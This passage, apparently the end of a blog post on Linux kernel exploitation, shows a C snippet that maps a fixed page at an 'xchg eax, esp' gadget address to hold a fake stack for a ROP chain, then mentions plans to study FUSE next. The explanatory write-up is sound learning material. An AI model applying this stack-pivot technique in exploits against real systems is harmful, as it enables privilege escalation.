// mmap page for rop chain
unsigned long pivot_target = xchg_eax_esp & 0xffffffff;
unsigned long *fake_stack = mmap(pivot_target & 0xfffff000, 0x50000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED|MAP_POPULATE, 0, 0);
Do let me know if you understand the above better.
What’s next?
I will probably be having a look at FUSE (Filesystem in Userspace)
next or why their exploit worked over, but it might take some time to do that and make a blog over it, so stay tuned I guess.